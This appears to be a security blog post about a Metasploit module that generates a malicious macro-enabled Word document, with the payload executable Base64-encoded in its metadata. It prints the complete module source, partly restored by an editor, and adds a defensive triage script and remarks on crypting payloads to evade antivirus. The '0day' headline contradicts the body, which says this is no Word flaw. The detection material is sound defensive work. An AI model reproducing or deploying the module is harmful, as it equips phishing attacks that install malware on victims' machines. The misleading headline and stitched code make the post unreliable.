Microsoft Word Macro Execution 0day Exploit Discovered

An exploit for Microsoft Office Word has been published that lets attackers execute malicious macro code. It takes the form of a Metasploit file-format module that builds a macro-enabled Word document (.docm) with an embedded payload. Note that this is not an exploit of a flaw in Word itself: as the module's own description states, the victim must manually enable macro execution before anything runs, so the document is only as dangerous as the user's willingness to click "Enable Content".

According to Wikipedia:

A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, Excel and PowerPoint, allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in e-mails. Many antivirus programs can detect macro viruses; however, they are still difficult to detect, as is their spread across the network.

An attacker who introduces a document like this into a network of computers can do real damage. A macro virus spreads much like bacteria in a petri dish, especially today, when files are constantly passed from one computer to another, not just in schools but also at workplaces and, of course, among friends and family. Because the carrier is an ordinary Office document sent as an e-mail attachment or dropped on a file share, such a virus can reach millions of computers within months, weeks, days or even hours.

The exploit was uploaded to an exploit database by an internet user going by the alias sinn3r, with the complete code available for anyone to use. The module's Author field lists "sinn3r # Metasploit", i.e. it was contributed to the Metasploit Framework by sinn3r, a Metasploit developer; whether the same person published it to the exploit database is not stated.


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'

# The class header, mixins and the start of initialize were lost in the
# page's extraction (everything between "class MetasploitModule" and the
# 'Name' value). They are restored here as the standard Metasploit
# file-format module skeleton that the closing "))" and "end" below require.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Microsoft Office Word Malicious Macro Execution",
      'Description'    => %q{
        This module generates a macro-enabled Microsoft Office Word document. The comments
        metadata in the data is injected with a Base64 encoded payload, which will be
        decoded by the macro and execute as a Windows executable.

        For a successful attack, the victim is required to manually enable macro execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r' # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'              => 'thread',
          'DisablePayloadHandler' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Microsoft Office Word', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 10 2012",
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new("BODY", [false, 'The message for the document body', '']),
      OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
    ], self.class)
  end

  # Called for every file of the unpacked template; the two files that carry
  # placeholders are rewritten before being handed back for packaging.
  def on_file_read(short_fname, full_fname)
    buf = File.read(full_fname)

    case short_fname
    when /document.xml/
      # Visible document body, taken from the BODY option.
      buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
    when /core.xml/
      # The payload EXE is Base64-encoded and stored in the document's
      # comments metadata, padded with 55 leading spaces; the macro decodes
      # and runs it at document-open time.
      b64_payload = ' ' * 55
      b64_payload << Rex::Text.encode_base64(generate_payload_exe)
      buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
    end

    # The original filename of __rels is actually ".rels".
    # But for some reason if this is our original filename, it won't be included
    # in the archive. So this hacks around that.
    case short_fname
    when /__rels/
      short_fname.gsub!(/__rels/, '.rels')
    end

    yield short_fname, buf
  end

  # Walks the template directory and rebuilds it as an OOXML zip container.
  def package_docm(path)
    zip = Rex::Zip::Archive.new

    Dir["#{path}/**/**"].each do |file|
      p = file.sub(path + '/', '')

      if File.directory?(file)
        print_status("Packaging directory: #{file}")
        zip.add_file(p)
      else
        on_file_read(p, file) do |fname, buf|
          print_status("Packaging file: #{fname}")
          zip.add_file(fname, buf)
        end
      end
    end

    zip.pack
  end

  def exploit
    print_status('Generating our docm file...')
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
    docm = package_docm(path)
    file_create(docm)
    super
  end
end
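The module's technique leaves a distinctive trace: a macro part in the container plus a long Base64 run in the document's comment metadata that decodes to a Windows executable. The following Python script is an added example, not part of the original post or of the Metasploit module, showing the triage check an analyst can run on a suspect .docm: it opens the file as a zip, confirms the macro part is present, and decodes any Base64 run in the core properties to look for an MZ header. It assumes the comment field is the dc:description element of docProps/core.xml and that the macro is stored in word/vbaProject.bin (neither path is stated on the page); the sample documents it inspects are constructed inside the script so it runs offline.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Assumed layout (not stated on the page): the module's PAYLOADGOESHERE
# placeholder sits in the Comments property, which OOXML stores as
# <dc:description> in docProps/core.xml; the macro lives in word/vbaProject.bin.
CORE_PROPS = "docProps/core.xml"
MACRO_PART = "word/vbaProject.bin"
# A run of at least 64 Base64 characters with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

# Constructed core-properties template used only to build the samples below.
CORE_XML_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<cp:coreProperties '
    'xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
    'xmlns:dc="http://purl.org/dc/elements/1.1/">'
    "<dc:title>Invoice</dc:title><dc:creator>msf</dc:creator>"
    "<dc:description>{comment}</dc:description>"
    "</cp:coreProperties>"
)


def build_sample_docm(payload_exe, with_macro):
    """Constructed sample: a minimal .docm-shaped zip mimicking the module's
    output. payload_exe=None yields a clean document for comparison."""
    if payload_exe is None:
        comment = "Quarterly figures, see page 2"
    else:
        # Same shape the module writes: 55 spaces, then Base64(EXE).
        comment = " " * 55 + base64.b64encode(payload_exe).decode("ascii")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(CORE_PROPS, CORE_XML_TEMPLATE.format(comment=comment))
        if with_macro:
            # Placeholder bytes standing in for a real OLE vbaProject stream.
            zf.writestr(MACRO_PART, b"\xd0\xcf\x11\xe0fake-vba-project")
    return buf.getvalue()


def triage_docm(data):
    """Flag the pattern the module produces: a macro part plus a Base64 blob
    in the core-properties metadata that decodes to a PE image (MZ header)."""
    report = {
        "has_macro": False,
        "embedded_pe": False,
        "pe_size": 0,
        "comment_leading_spaces": 0,
    }
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        report["has_macro"] = MACRO_PART in names
        if CORE_PROPS not in names:
            report["suspicious"] = False
            return report
        root = ET.fromstring(zf.read(CORE_PROPS))
    # Scan every text node of core.xml, not just dc:description, so a
    # payload parked in another property is caught as well.
    for elem in root.iter():
        text = elem.text or ""
        for match in B64_RUN.finditer(text):
            try:
                blob = base64.b64decode(match.group(0), validate=True)
            except ValueError:
                continue
            if blob[:2] == b"MZ":
                report["embedded_pe"] = True
                report["pe_size"] = len(blob)
                report["comment_leading_spaces"] = len(text) - len(text.lstrip(" "))
    report["suspicious"] = report["has_macro"] and report["embedded_pe"]
    return report


if __name__ == "__main__":
    fake_exe = b"MZ" + b"\x90" * 200  # constructed stand-in for generate_payload_exe
    for label, doc in (("clean", build_sample_docm(None, False)),
                       ("module-style", build_sample_docm(fake_exe, True))):
        print(label, triage_docm(doc))
```

The MZ check is deliberately strict: a macro-enabled document whose metadata holds no executable is reported with has_macro set but not marked suspicious, since plenty of legitimate business documents carry VBA. Conversely, a document that carries an executable in its comment field has no benign explanation and should be quarantined regardless of whether the macro itself looks obfuscated.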


Viruses embedded in other kinds and formats of files can also easily go unnoticed by antivirus products. Silent viruses and macro viruses such as this one can be made undetectable by a technique known as crypting, in which the payload is encrypted or packed so that signature scanners no longer recognise it. Techniques like these have existed since the very first virus was created, and over time attackers have become smarter, as have their destructive viruses and their methods of evading detection. In this module's case, however, the payload is only Base64-encoded in the document's comment metadata, so a scanner that decodes long Base64 runs in docProps/core.xml and checks for an MZ header will find the embedded executable without having to analyse the macro at all.